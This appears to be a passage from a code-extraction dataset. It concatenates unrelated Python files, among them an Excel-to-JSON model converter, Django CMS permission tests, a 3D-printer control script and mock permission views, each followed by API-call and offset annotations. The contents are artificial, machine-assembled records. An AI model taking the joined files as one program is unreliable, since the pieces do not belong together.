["damages_states_constructor"][counter]\
["recovery_function_constructor"]\
["recovery_state_definition"]\
= "Not Available."
else:
tempDic = OrderedDict()
tempDic["function_name"]\
= fragility_data[key]["damage_function"]
tempDic["median"]\
= fragility_data[key]["median"]
tempDic["beta"]\
= fragility_data[key]["beta"]
tempDic["location"]\
= fragility_data[key]["location"]
tempDic["fragility_source"]\
= fragility_data[key]["fragility_source"]
tempDic["minimum"]\
= fragility_data[key]["minimum"]
if key in damage_state_df.keys():
tempDic["damage_state_definition"]\
= damage_state_df[str(eval(key).pop(0))]
else:
tempDic["damage_state_definition"]\
= "Not Available."
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["response_function_constructor"]\
["piecewise_function_constructor"].append(tempDic)
return new_json_structure
def read_excel_to_json(excel_file_path):
system_meta = pd.read_excel(
excel_file_path, sheet_name='system_meta',
index_col=0, header=0,
skiprows=0, skipinitialspace=True)
system_meta = system_meta.to_json(orient='index')
system_meta = standardize_json_string(system_meta)
component_list = pd.read_excel(
excel_file_path, sheet_name='component_list',
index_col=0, header=0,
skiprows=0, skipinitialspace=True)
component_list = component_list.to_json(orient='index')
component_list = standardize_json_string(component_list)
node_conn_df = pd.read_excel(
excel_file_path, sheet_name='component_connections',
index_col=None, header=0,
skiprows=0, skipinitialspace=True)
node_conn_df = node_conn_df.to_json(orient='index')
node_conn_df = standardize_json_string(node_conn_df)
sysinp_setup = pd.read_excel(
excel_file_path, sheet_name='supply_setup',
index_col=0, header=0,
skiprows=0, skipinitialspace=True)
sysinp_setup = sysinp_setup.to_json(orient='index')
sysinp_setup = standardize_json_string(sysinp_setup)
sysout_setup = pd.read_excel(
excel_file_path, sheet_name='output_setup',
index_col=0, header=0,
skiprows=0, skipinitialspace=True)
sysout_setup = sysout_setup.sort_values(by=['priority'], ascending=True)
sysout_setup = sysout_setup.to_json(orient='index')
sysout_setup = standardize_json_string(sysout_setup)
fragility_data = pd.read_excel(
excel_file_path, sheet_name='comp_type_dmg_algo',
index_col=[0, 1, 2], header=0,
skiprows=0, skipinitialspace=True)
fragility_data = fragility_data.to_json(orient='index')
fragility_data = standardize_json_string(fragility_data)
damage_state_df = pd.read_excel(
excel_file_path, sheet_name='damage_state_def',
index_col=[0, 1], header=0,
skiprows=0, skipinitialspace=True)
damage_state_df = damage_state_df.to_json(orient='index')
damage_state_df = standardize_json_string(damage_state_df)
sys_model_json = '{ ' \
'"system_meta": ' + system_meta + ',' \
'"component_list": ' + component_list + ',' \
'"node_conn_df": ' + node_conn_df + ',' \
'"sysinp_setup": ' + sysinp_setup + ',' \
'"sysout_setup": ' + sysout_setup + ',' \
'"fragility_data": ' + fragility_data + ',' \
'"damage_state_df": ' + damage_state_df + \
' }'
return sys_model_json
def main():
# get list off all the excel files
model_file_paths = []
for root, dir_names, file_names in os.walk(os.path.dirname(os.getcwd())):
for file_name in file_names:
if file_name.endswith('.xlsx'):
if 'models' in root:
excel_file_path = os.path.join(root, file_name)
model_file_paths.append(excel_file_path)
for excel_file_path in model_file_paths:
parent_folder_name = os.path.dirname(excel_file_path)
file_name = os.path.splitext(os.path.basename(excel_file_path))[0]
json_obj = json.loads(read_excel_to_json(excel_file_path),
object_pairs_hook=OrderedDict)
new_json_structure_obj = update_json_structure(json_obj)
parsed = json.dumps(new_json_structure_obj, indent=4, sort_keys=True)
json_file_path = os.path.join(parent_folder_name, file_name + '.json')
write_json_to_file(parsed, json_file_path)
if __name__ == "__main__":
main()
| [
"json.loads",
"collections.OrderedDict",
"json.dumps",
"os.path.join",
"os.getcwd",
"os.path.dirname",
"os.path.basename",
"pandas.read_excel"
] | [((145, 166), 'json.loads', 'json.loads', (['json_data'], {}), '(json_data)\n', (155, 166), False, 'import json\n'), ((180, 224), 'json.dumps', 'json.dumps', (['parsed'], {'indent': '(4)', 'sort_keys': '(True)'}), '(parsed, indent=4, sort_keys=True)\n', (190, 224), False, 'import json\n'), ((1589, 1602), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1600, 1602), False, 'from collections import OrderedDict\n'), ((1860, 1873), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1871, 1873), False, 'from collections import OrderedDict\n'), ((14601, 14719), 'pandas.read_excel', 'pd.read_excel', (['excel_file_path'], {'sheet_name': '"""system_meta"""', 'index_col': '(0)', 'header': '(0)', 'skiprows': '(0)', 'skipinitialspace': '(True)'}), "(excel_file_path, sheet_name='system_meta', index_col=0,\n header=0, skiprows=0, skipinitialspace=True)\n", (14614, 14719), True, 'import pandas as pd\n'), ((14872, 14993), 'pandas.read_excel', 'pd.read_excel', (['excel_file_path'], {'sheet_name': '"""component_list"""', 'index_col': '(0)', 'header': '(0)', 'skiprows': '(0)', 'skipinitialspace': '(True)'}), "(excel_file_path, sheet_name='component_list', index_col=0,\n header=0, skiprows=0, skipinitialspace=True)\n", (14885, 14993), True, 'import pandas as pd\n'), ((15156, 15287), 'pandas.read_excel', 'pd.read_excel', (['excel_file_path'], {'sheet_name': '"""component_connections"""', 'index_col': 'None', 'header': '(0)', 'skiprows': '(0)', 'skipinitialspace': '(True)'}), "(excel_file_path, sheet_name='component_connections',\n index_col=None, header=0, skiprows=0, skipinitialspace=True)\n", (15169, 15287), True, 'import pandas as pd\n'), ((15442, 15561), 'pandas.read_excel', 'pd.read_excel', (['excel_file_path'], {'sheet_name': '"""supply_setup"""', 'index_col': '(0)', 'header': '(0)', 'skiprows': '(0)', 'skipinitialspace': '(True)'}), "(excel_file_path, sheet_name='supply_setup', index_col=0,\n header=0, skiprows=0, skipinitialspace=True)\n", (15455, 15561), True, 'import pandas as pd\n'), ((15716, 15835), 'pandas.read_excel', 'pd.read_excel', (['excel_file_path'], {'sheet_name': '"""output_setup"""', 'index_col': '(0)', 'header': '(0)', 'skiprows': '(0)', 'skipinitialspace': '(True)'}), "(excel_file_path, sheet_name='output_setup', index_col=0,\n header=0, skiprows=0, skipinitialspace=True)\n", (15729, 15835), True, 'import pandas as pd\n'), ((16069, 16203), 'pandas.read_excel', 'pd.read_excel', (['excel_file_path'], {'sheet_name': '"""comp_type_dmg_algo"""', 'index_col': '[0, 1, 2]', 'header': '(0)', 'skiprows': '(0)', 'skipinitialspace': '(True)'}), "(excel_file_path, sheet_name='comp_type_dmg_algo', index_col=[\n 0, 1, 2], header=0, skiprows=0, skipinitialspace=True)\n", (16082, 16203), True, 'import pandas as pd\n'), ((16368, 16496), 'pandas.read_excel', 'pd.read_excel', (['excel_file_path'], {'sheet_name': '"""damage_state_def"""', 'index_col': '[0, 1]', 'header': '(0)', 'skiprows': '(0)', 'skipinitialspace': '(True)'}), "(excel_file_path, sheet_name='damage_state_def', index_col=[0,\n 1], header=0, skiprows=0, skipinitialspace=True)\n", (16381, 16496), True, 'import pandas as pd\n'), ((1971, 1984), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1982, 1984), False, 'from collections import OrderedDict\n'), ((3126, 3139), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (3137, 3139), False, 'from collections import OrderedDict\n'), ((3248, 3261), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (3259, 3261), False, 'from collections import OrderedDict\n'), ((3867, 3880), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (3878, 3880), False, 'from collections import OrderedDict\n'), ((4492, 4505), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (4503, 4505), False, 'from collections import OrderedDict\n'), ((17655, 17687), 'os.path.dirname', 'os.path.dirname', (['excel_file_path'], {}), '(excel_file_path)\n', (17670, 17687), False, 'import os\n'), ((17975, 18035), 'json.dumps', 'json.dumps', (['new_json_structure_obj'], {'indent': '(4)', 'sort_keys': '(True)'}), '(new_json_structure_obj, indent=4, sort_keys=True)\n', (17985, 18035), False, 'import json\n'), ((18062, 18115), 'os.path.join', 'os.path.join', (['parent_folder_name', "(file_name + '.json')"], {}), "(parent_folder_name, file_name + '.json')\n", (18074, 18115), False, 'import os\n'), ((17317, 17328), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (17326, 17328), False, 'import os\n'), ((17725, 17758), 'os.path.basename', 'os.path.basename', (['excel_file_path'], {}), '(excel_file_path)\n', (17741, 17758), False, 'import os\n'), ((5782, 5795), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (5793, 5795), False, 'from collections import OrderedDict\n'), ((6714, 6727), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (6725, 6727), False, 'from collections import OrderedDict\n'), ((12047, 12060), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (12058, 12060), False, 'from collections import OrderedDict\n'), ((13299, 13312), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (13310, 13312), False, 'from collections import OrderedDict\n'), ((17488, 17517), 'os.path.join', 'os.path.join', (['root', 'file_name'], {}), '(root, file_name)\n', (17500, 17517), False, 'import os\n'), ((10388, 10401), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (10399, 10401), False, 'from collections import OrderedDict\n')] |
# -*- coding: utf-8 -*-
from datetime import datetime, timedelta
from django.contrib.auth.models import User
from django.test import TestCase
from cms.api import assign_user_to_page, create_page
from ..helpers import get_request
from ..views import SearchResultsView
class PermissionsTestCase(TestCase):
def setUp(self):
self.view = SearchResultsView()
self.request = get_request('en')
self.request.GET = self.request.GET.copy()
self.request.GET['q'] = 'test_page'
self.view.request = self.request
self.user = User.objects.create_user(
username='jacob', email='jacob@…', password='<PASSWORD>')
self.other_user = User.objects.create_user(
username='fred', email='fred@…', password='<PASSWORD>')
def _create_page(self, **data):
return create_page(
title='test_page',
reverse_id='testpage',
template='test.html',
language='en',
**data
)
####################################################################
# login_required #
####################################################################
def test_not_included_when_login_required_and_user_anonymous(self):
page = self._create_page(login_required=True)
page.publish('en')
self.assertEqual(len(self.view.get_queryset()), 0)
def test_included_when_login_required_when_user_logged_in(self):
self.view.request.user = self.user
page = self._create_page(login_required=True)
page.publish('en')
self.assertEqual(len(self.view.get_queryset()), 1)
####################################################################
# page permissions #
####################################################################
def test_included_when_perm_set_and_this_user_included(self):
self.view.request.user = self.user
page = self._create_page(login_required=True)
page.publish('en')
assign_user_to_page(page, self.user, can_view=True)
self.assertEqual(len(self.view.get_queryset()), 1)
def test_not_included_when_perm_set_and_this_user_not_included(self):
self.view.request.user = self.user
page = self._create_page(login_required=True)
page.publish('en')
assign_user_to_page(page, self.other_user, can_view=True)
self.assertEqual(len(self.view.get_queryset()), 0)
def test_included_when_no_perm_set(self):
self.view.request.user = self.user
page = self._create_page(login_required=True)
page.publish('en')
self.assertEqual(len(self.view.get_queryset()), 1)
####################################################################
# ensure perms still valid when login_required was not ticked #
####################################################################
def test_included_when_perm_set_and_this_user_included_2(self):
self.view.request.user = self.user
page = self._create_page(login_required=False)
page.publish('en')
assign_user_to_page(page, self.user, can_view=True)
self.assertEqual(len(self.view.get_queryset()), 1)
def test_not_included_when_perm_set_and_this_user_not_included_2(self):
self.view.request.user = self.user
page = self._create_page(login_required=False)
page.publish('en')
assign_user_to_page(page, self.other_user, can_view=True)
self.assertEqual(len(self.view.get_queryset()), 0)
def test_included_when_no_perm_set_2(self):
self.view.request.user = self.user
page = self._create_page(login_required=False)
page.publish('en')
self.assertEqual(len(self.view.get_queryset()), 1)
| [
"cms.api.assign_user_to_page",
"cms.api.create_page",
"django.contrib.auth.models.User.objects.create_user"
] | [((567, 654), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', ([], {'username': '"""jacob"""', 'email': '"""jacob@…"""', 'password': '"""<PASSWORD>"""'}), "(username='jacob', email='jacob@…', password=\n '<PASSWORD>')\n", (591, 654), False, 'from django.contrib.auth.models import User\n'), ((689, 774), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', ([], {'username': '"""fred"""', 'email': '"""fred@…"""', 'password': '"""<PASSWORD>"""'}), "(username='fred', email='fred@…', password='<PASSWORD>'\n )\n", (713, 774), False, 'from django.contrib.auth.models import User\n'), ((835, 937), 'cms.api.create_page', 'create_page', ([], {'title': '"""test_page"""', 'reverse_id': '"""testpage"""', 'template': '"""test.html"""', 'language': '"""en"""'}), "(title='test_page', reverse_id='testpage', template='test.html',\n language='en', **data)\n", (846, 937), False, 'from cms.api import assign_user_to_page, create_page\n'), ((2109, 2160), 'cms.api.assign_user_to_page', 'assign_user_to_page', (['page', 'self.user'], {'can_view': '(True)'}), '(page, self.user, can_view=True)\n', (2128, 2160), False, 'from cms.api import assign_user_to_page, create_page\n'), ((2427, 2484), 'cms.api.assign_user_to_page', 'assign_user_to_page', (['page', 'self.other_user'], {'can_view': '(True)'}), '(page, self.other_user, can_view=True)\n', (2446, 2484), False, 'from cms.api import assign_user_to_page, create_page\n'), ((3196, 3247), 'cms.api.assign_user_to_page', 'assign_user_to_page', (['page', 'self.user'], {'can_view': '(True)'}), '(page, self.user, can_view=True)\n', (3215, 3247), False, 'from cms.api import assign_user_to_page, create_page\n'), ((3517, 3574), 'cms.api.assign_user_to_page', 'assign_user_to_page', (['page', 'self.other_user'], {'can_view': '(True)'}), '(page, self.other_user, can_view=True)\n', (3536, 3574), False, 'from cms.api import assign_user_to_page, create_page\n')] |
# -*-coding:Utf-8 -*
from repetier_ui import *
import time
import set_ifttt
from FUTIL.my_logging import *
my_logging(console_level = DEBUG, logfile_level = INFO)
HD = repetier_printer (repetier_api(api_key='<KEY>'),'HD')
sys.path.insert(0,'/home/pi')
import iftt_key
ifttt0 = set_ifttt.ifttt(iftt_key.key)
def wake_up():
ifttt0.send_cmd("HD_on")
UI = repetier_ui(debug=False, wake_up = wake_up ) #debug = True : pas d'envoie des gcode
UI.add_action(22,repetier_file_action("extract.gcode",HD))
UI.add_action(27,repetier_file_action("extrude_100_vite.gcode",HD))
UI.add_action(17,repetier_file_action("extrude_50.gcode",HD))
UI.add_action(10,repetier_file_action("goto_z_max.gcode",HD, only_if_has_axis = True))
UI.add_action(19,repetier_file_action("stop_all.gcode",HD))
UI.add_action(18,repetier_file_action("pause.gcode", HD, only_if_printing = True)) # Detection de présence fil
UI.add_successive_actions(26,repetier_file_action("pause.gcode",HD), repetier_action_action("continueJob",HD))
try:
while True:
time.sleep(10)
except KeyboardInterrupt:
print('interrupted!')
finally:
UI.close()
| [
"time.sleep",
"set_ifttt.ifttt"
] | [((283, 312), 'set_ifttt.ifttt', 'set_ifttt.ifttt', (['iftt_key.key'], {}), '(iftt_key.key)\n', (298, 312), False, 'import set_ifttt\n'), ((1036, 1050), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (1046, 1050), False, 'import time\n')] |
import pandas as pd
class Normalizer:
csv_data = 'dataset/water_potability.csv' # file from work data
def __init__(self) -> None:
self.dataset = pd.read_csv(self.csv_data)
self.__normalize_data__()
self.__separate__()
'''
@ convert all info to number
'''
def __normalize_data__(self) -> None:
self.dataset = self.dataset.apply(pd.to_numeric)
self.dataset['ph'] = self.dataset['ph'].fillna(self.dataset.groupby('Potability')['ph'].transform('mean'))
self.dataset['Sulfate'] = self.dataset['Sulfate'].fillna(self.dataset.groupby('Potability')['Sulfate'].transform('mean'))
self.dataset['Trihalomethanes'] = self.dataset['Trihalomethanes'].fillna(self.dataset.groupby('Potability')['Trihalomethanes'].transform('mean'))
'''
separates the dataset where clause potable or unpotable
'''
def __separate__(self):
self.dataset_potable = self.dataset.loc[self.dataset['Potability'] == 1]
self.dataset_unpotable = self.dataset.loc[self.dataset['Potability'] == 0]
self.dataset_potable = self.dataset_potable.reset_index()
self.dataset_unpotable = self.dataset_unpotable.reset_index()
if __name__ == '__main__':
normalizer = Normalizer() | [
"pandas.read_csv"
] | [((156, 182), 'pandas.read_csv', 'pd.read_csv', (['self.csv_data'], {}), '(self.csv_data)\n', (167, 182), True, 'import pandas as pd\n')] |
# -*- coding: utf-8 -*-
from distutils.version import LooseVersion
from marshmallow.utils import missing
# Make marshmallow's validation functions importable from webargs
from marshmallow import validate
from webargs.core import dict2schema, ValidationError
from webargs import fields
__version__ = "5.3.2"
__version_info__ = tuple(LooseVersion(__version__).version)
__author__ = "<NAME>"
__license__ = "MIT"
__all__ = ("dict2schema", "ValidationError", "fields", "missing", "validate")
| [
"distutils.version.LooseVersion"
] | [((335, 360), 'distutils.version.LooseVersion', 'LooseVersion', (['__version__'], {}), '(__version__)\n', (347, 360), False, 'from distutils.version import LooseVersion\n')] |
#!C:\Users\stpny\Downloads\grasp_public-master\grasp_public-master\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'imageio==2.5.0','console_scripts','imageio_remove_bin'
__requires__ = 'imageio==2.5.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('imageio==2.5.0', 'console_scripts', 'imageio_remove_bin')()
)
| [
"re.sub",
"pkg_resources.load_entry_point"
] | [((321, 373), 're.sub', 're.sub', (['"""(-script\\\\.pyw?|\\\\.exe)?$"""', '""""""', 'sys.argv[0]'], {}), "('(-script\\\\.pyw?|\\\\.exe)?$', '', sys.argv[0])\n", (327, 373), False, 'import re\n'), ((397, 472), 'pkg_resources.load_entry_point', 'load_entry_point', (['"""imageio==2.5.0"""', '"""console_scripts"""', '"""imageio_remove_bin"""'], {}), "('imageio==2.5.0', 'console_scripts', 'imageio_remove_bin')\n", (413, 472), False, 'from pkg_resources import load_entry_point\n')] |
import logging
import sys
from .pipeline import MWFPipeline
def build(config):
config["source"] = config["source"] or {}
config["tweaks"] = config["tweaks"] or []
config["converter"] = config["converter"] or {}
config["generator"] = config["generator"] or []
pipeline = MWFPipeline(config["source"].get("api_path"))
if config["source"].get("api_path") is not None:
pipeline.fetch_titles(**config["source"].get("kwargs"))
if config["source"].get("file_path") is not None:
title_file_path = config["source"].get("file_path")
if title_file_path is None:
logging.error("No api_path or file_path provided. Stop.")
sys.exit(1)
if isinstance(title_file_path, str):
title_file_path = [title_file_path]
for i in title_file_path:
pipeline.load_titles_from_file(i,
**config["source"].get("kwargs"))
pipeline.convert_to_words(config["tweaks"])
pipeline.export_words(config["converter"].get("use"),
**config["converter"].get("kwargs"))
generators = config["generator"]
if not isinstance(generators, list):
generators = [generators]
for gen in generators:
pipeline.generate_dict(gen.get("use"), **gen.get("kwargs"))
return pipeline.dict
| [
"logging.error",
"sys.exit"
] | [((618, 675), 'logging.error', 'logging.error', (['"""No api_path or file_path provided. Stop."""'], {}), "('No api_path or file_path provided. Stop.')\n", (631, 675), False, 'import logging\n'), ((688, 699), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (696, 699), False, 'import sys\n')] |
from django.shortcuts import render
from django.http import HttpResponse
import json
# Create your views here.
def info(request):
userInfo = {
'id': '4291d7da9005377ec9aec4a71ea837f',
'name': '天野远子',
'username': 'admin',
'password': '',
'avatar': '/avatar2.jpg',
'status': 1,
'telephone': '',
'lastLoginIp': '192.168.127.12',
'lastLoginTime': 1534837621348,
'creatorId': 'admin',
'createTime': 1497160610259,
'merchantCode': 'TLif2btpzg079h15bk',
'deleted': 0,
'roleId': 'admin',
'role': {}
}
roleObj = {
'permissions': [],
'id': 'admin',
'name': '管理员',
'describe': '拥有所有权限',
'status': 1,
'creatorId': 'system',
'createTime': 1497160610259,
'deleted': 0,
'permissions': [{
'roleId': 'admin',
'permissionId': 'dashboard',
'permissionName': '仪表盘',
'actions': '[{"action":"add","defaultCheck":false,"describe":"新增"},{"action":"query","defaultCheck":false,"describe":"查询"},{"action":"get","defaultCheck":false,"describe":"详情"},{"action":"update","defaultCheck":false,"describe":"修改"},{"action":"delete","defaultCheck":false,"describe":"删除"}]',
'actionEntitySet': [{
'action': 'add',
'describe': '新增',
'defaultCheck': False
}, {
'action': 'query',
'describe': '查询',
'defaultCheck': False
}, {
'action': 'get',
'describe': '详情',
'defaultCheck': False
}, {
'action': 'update',
'describe': '修改',
'defaultCheck': False
}, {
'action': 'delete',
'describe': '删除',
'defaultCheck': False
}],
'actionList': None,
'dataAccess': None
}, {
'roleId': 'admin',
'permissionId': 'exception',
'permissionName': '异常页面权限',
'actions': '[{"action":"add","defaultCheck":false,"describe":"新增"},{"action":"query","defaultCheck":false,"describe":"查询"},{"action":"get","defaultCheck":false,"describe":"详情"},{"action":"update","defaultCheck":false,"describe":"修改"},{"action":"delete","defaultCheck":false,"describe":"删除"}]',
'actionEntitySet': [{
'action': 'add',
'describe': '新增',
'defaultCheck': False
}, {
'action': 'query',
'describe': '查询',
'defaultCheck': False
}, {
'action': 'get',
'describe': '详情',
'defaultCheck': False
}, {
'action': 'update',
'describe': '修改',
'defaultCheck': False
}, {
'action': 'delete',
'describe': '删除',
'defaultCheck': False
}],
'actionList': None,
'dataAccess': None
}, {
'roleId': 'admin',
'permissionId': 'result',
'permissionName': '结果权限',
'actions': '[{"action":"add","defaultCheck":false,"describe":"新增"},{"action":"query","defaultCheck":false,"describe":"查询"},{"action":"get","defaultCheck":false,"describe":"详情"},{"action":"update","defaultCheck":false,"describe":"修改"},{"action":"delete","defaultCheck":false,"describe":"删除"}]',
'actionEntitySet': [{
'action': 'add',
'describe': '新增',
'defaultCheck': False
}, {
'action': 'query',
'describe': '查询',
'defaultCheck': False
}, {
'action': 'get',
'describe': '详情',
'defaultCheck': False
}, {
'action': 'update',
'describe': '修改',
'defaultCheck': False
}, {
'action': 'delete',
'describe': '删除',
'defaultCheck': False
}],
'actionList': None,
'dataAccess': None
}, {
'roleId': 'admin',
'permissionId': 'profile',
'permissionName': '详细页权限',
'actions': '[{"action":"add","defaultCheck":false,"describe":"新增"},{"action":"query","defaultCheck":false,"describe":"查询"},{"action":"get","defaultCheck":false,"describe":"详情"},{"action":"update","defaultCheck":false,"describe":"修改"},{"action":"delete","defaultCheck":false,"describe":"删除"}]',
'actionEntitySet': [{
'action': 'add',
'describe': '新增',
'defaultCheck': False
}, {
'action': 'query',
'describe': '查询',
'defaultCheck': False
}, {
'action': 'get',
'describe': '详情',
'defaultCheck': False
}, {
'action': 'update',
'describe': '修改',
'defaultCheck': False
}, {
'action': 'delete',
'describe': '删除',
'defaultCheck': False
}],
'actionList': None,
'dataAccess': None
}, {
'roleId': 'admin',
'permissionId': 'table',
'permissionName': '表格权限',
'actions': '[{"action":"add","defaultCheck":false,"describe":"新增"},{"action":"import","defaultCheck":false,"describe":"导入"},{"action":"get","defaultCheck":false,"describe":"详情"},{"action":"update","defaultCheck":false,"describe":"修改"}]',
'actionEntitySet': [{
'action': 'add',
'describe': '新增',
'defaultCheck': False
}, {
'action': 'import',
'describe': '导入',
'defaultCheck': False
}, {
'action': 'get',
'describe': '详情',
'defaultCheck': False
}, {
'action': 'update',
'describe': '修改',
'defaultCheck': False
}],
'actionList': None,
'dataAccess': None
}, {
'roleId': 'admin',
'permissionId': 'form',
'permissionName': '表单权限',
'actions': '[{"action":"add","defaultCheck":false,"describe":"新增"},{"action":"get","defaultCheck":false,"describe":"详情"},{"action":"query","defaultCheck":false,"describe":"查询"},{"action":"update","defaultCheck":false,"describe":"修改"},{"action":"delete","defaultCheck":false,"describe":"删除"}]',
'actionEntitySet': [{
'action': 'add',
'describe': '新增',
'defaultCheck': False
}, {
'action': 'get',
'describe': '详情',
'defaultCheck': False
}, {
'action': 'query',
'describe': '查询',
'defaultCheck': False
}, {
'action': 'update',
'describe': '修改',
'defaultCheck': False
}, {
'action': 'delete',
'describe': '删除',
'defaultCheck': False
}],
'actionList': None,
'dataAccess': None
}, {
'roleId': 'admin',
'permissionId': 'order',
'permissionName': '订单管理',
'actions': '[{"action":"add","defaultCheck":false,"describe":"新增"},{"action":"query","defaultCheck":false,"describe":"查询"},{"action":"get","defaultCheck":false,"describe":"详情"},{"action":"update","defaultCheck":false,"describe":"修改"},{"action":"delete","defaultCheck":false,"describe":"删除"}]',
'actionEntitySet': [{
'action': 'add',
'describe': '新增',
'defaultCheck': False
}, {
'action': 'query',
'describe': '查询',
'defaultCheck': False
}, {
'action': 'get',
'describe': '详情',
'defaultCheck': False
}, {
'action': 'update',
'describe': '修改',
'defaultCheck': False
}, {
'action': 'delete',
'describe': '删除',
'defaultCheck': False
}],
'actionList': None,
'dataAccess': None
}, {
'roleId': 'admin',
'permissionId': 'permission',
'permissionName': '权限管理',
'actions': '[{"action":"add","defaultCheck":false,"describe":"新增"},{"action":"get","defaultCheck":false,"describe":"详情"},{"action":"update","defaultCheck":false,"describe":"修改"},{"action":"delete","defaultCheck":false,"describe":"删除"}]',
'actionEntitySet': [{
'action': 'add',
'describe': '新增',
'defaultCheck': False
}, {
'action': 'get',
'describe': '详情',
'defaultCheck': False
}, {
'action': 'update',
'describe': '修改',
'defaultCheck': False
}, {
'action': 'delete',
'describe': '删除',
'defaultCheck': False
}],
'actionList': None,
'dataAccess': None
}, {
'roleId': 'admin',
'permissionId': 'role',
'permissionName': '角色管理',
'actions': '[{"action":"add","defaultCheck":false,"describe":"新增"},{"action":"get","defaultCheck":false,"describe":"详情"},{"action":"update","defaultCheck":false,"describe":"修改"},{"action":"delete","defaultCheck":false,"describe":"删除"}]',
'actionEntitySet': [{
'action': 'add',
'describe': '新增',
'defaultCheck': False
}, {
'action': 'get',
'describe': '详情',
'defaultCheck': False
}, {
'action': 'update',
'describe': '修改',
'defaultCheck': False
}, {
'action': 'delete',
'describe': '删除',
'defaultCheck': False
}],
'actionList': None,
'dataAccess': None
}, {
'roleId': 'admin',
'permissionId': 'table',
'permissionName': '桌子管理',
'actions': '[{"action":"add","defaultCheck":false,"describe":"新增"},{"action":"get","defaultCheck":false,"describe":"详情"},{"action":"query","defaultCheck":false,"describe":"查询"},{"action":"update","defaultCheck":false,"describe":"修改"},{"action":"delete","defaultCheck":false,"describe":"删除"}]',
'actionEntitySet': [{
'action': 'add',
'describe': '新增',
'defaultCheck': False
}, {
'action': 'get',
'describe': '详情',
'defaultCheck': False
}, {
'action': 'query',
'describe': '查询',
'defaultCheck': False
}, {
'action': 'update',
'describe': '修改',
'defaultCheck': False
}, {
'action': 'delete',
'describe': '删除',
'defaultCheck': False
}],
'actionList': None,
'dataAccess': None
}, {
'roleId': 'admin',
'permissionId': 'user',
'permissionName': '用户管理',
'actions': '[{"action":"add","defaultCheck":false,"describe":"新增"},{"action":"import","defaultCheck":false,"describe":"导入"},{"action":"get","defaultCheck":false,"describe":"详情"},{"action":"update","defaultCheck":false,"describe":"修改"},{"action":"delete","defaultCheck":false,"describe":"删除"},{"action":"export","defaultCheck":false,"describe":"导出"}]',
'actionEntitySet': [{
'action': 'add',
'describe': '新增',
'defaultCheck': False
}, {
'action': 'import',
'describe': '导入',
'defaultCheck': False
}, {
'action': 'get',
'describe': '详情',
'defaultCheck': False
}, {
'action': 'update',
'describe': '修改',
'defaultCheck': False
}, {
'action': 'delete',
'describe': '删除',
'defaultCheck': False
}, {
'action': 'export',
'describe': '导出',
'defaultCheck': False
}],
'actionList': None,
'dataAccess': None
}],
'permissions': [{
'roleId': 'admin',
'permissionId': 'support',
'permissionName': '超级模块',
'actions': '[{"action":"add","defaultCheck":false,"describe":"新增"},{"action":"import","defaultCheck":false,"describe":"导入"},{"action":"get","defaultCheck":false,"describe":"详情"},{"action":"update","defaultCheck":false,"describe":"修改"},{"action":"delete","defaultCheck":false,"describe":"删除"},{"action":"export","defaultCheck":false,"describe":"导出"}]',
'actionEntitySet': [{
'action': 'add',
'describe': '新增',
'defaultCheck': False
}, {
'action': 'import',
'describe': '导入',
'defaultCheck': False
}, {
'action': 'get',
'describe': '详情',
'defaultCheck': False
}, {
'action': 'update',
'describe': '修改',
'defaultCheck': False
}, {
'action': 'delete',
'describe': '删除',
'defaultCheck': False
}, {
'action': 'export',
'describe': '导出',
'defaultCheck': False
}],
'actionList': None,
'dataAccess': None
}, {
'roleId': 'admin',
'permissionId': 'pioverview',
'permissionName': 'pioverview',
'actions': '[{"action":"add","defaultCheck":false,"describe":"新增"},{"action":"query","defaultCheck":false,"describe":"查询"},{"action":"get","defaultCheck":false,"describe":"详情"},{"action":"update","defaultCheck":false,"describe":"修改"},{"action":"delete","defaultCheck":false,"describe":"删除"}]',
'actionEntitySet': [{
'action': 'add',
'describe': '新增',
'defaultCheck': False
}, {
'action': 'query',
'describe': '查询',
'defaultCheck': False
}, {
'action': 'get',
'describe': '详情',
'defaultCheck': False
}, {
'action': 'update',
'describe': '修改',
'defaultCheck': False
}, {
'action': 'delete',
'describe': '删除',
'defaultCheck': False
}],
'actionList': None,
'dataAccess': None
}]
}
userInfo = {
'result': {
'role': roleObj
}
}
return HttpResponse(json.dumps(userInfo, indent=4))
def nav(request):
nav = [
# // dashboard
{
'name': 'dashboard',
'parentId': -1,
'id': 1,
'meta': {
'icon': 'dashboard',
'title': '仪表盘',
'show': True
},
'component': 'RouteView',
'redirect': '/dashboard/workplace'
},
{
'name': 'workplace',
'parentId': 1,
'id': 7,
'meta': {
'title': '工作台',
'show': True
},
'component': 'Workplace'
},
{
'name': 'monitor',
'path': 'https://www.baidu.com/',
'parentId': 1,
'id': 3,
'meta': {
'title': '监控页(外部)',
'target': '_blank',
'show': True
}
},
{
'name': 'analysis',
'parentId': 1,
'id': 2,
'meta': {
'title': '分析页',
'show': True
},
'component': 'Analysis'
},
{
'name': 'tests',
'parentId': 1,
'id': 8,
'meta': {
'title': '测试功能',
'show': True
},
'component': 'TestWork'
},
# //pi overview
{
'name': 'pioverview',
'parentId': -1,
'id': 100,
'meta': {
'icon': 'dashboard',
'title': 'Pi Overview',
'show': True
},
'component': 'RouteView',
'redirect': '/pioverview/gpioOverview'
},
{
'name': 'gpioOverview',
'parentId': 100,
'id': 6,
'meta': {
'title': 'GPIO Overview'
},
'component': 'PiGPIOStatus'
},
{
